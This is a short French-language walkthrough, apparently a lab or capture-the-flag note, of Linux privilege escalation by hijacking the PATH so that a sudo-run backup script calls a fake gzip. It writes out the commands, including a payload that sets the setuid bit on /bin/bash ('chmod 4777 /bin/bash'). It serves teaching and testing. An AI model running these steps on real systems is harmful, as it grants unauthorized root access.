PATH Hijacking (gzip) - Linux Privilege Escalation

Nous listons les permissions sudo :

sudo -l

Nous trouvons un script exécutable en tant que root utilisant gzip sans chemin absolu.

Nous créons un fichier gzip malveillant dans /tmp/ :

chmod 4777 /bin/bash

Nous modifions la variable PATH pour prioriser /tmp/ :

export PATH=/tmp/:$PATH

Nous exécutons le script en tant que root :

sudo /opt/scripts/access_backup.sh

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?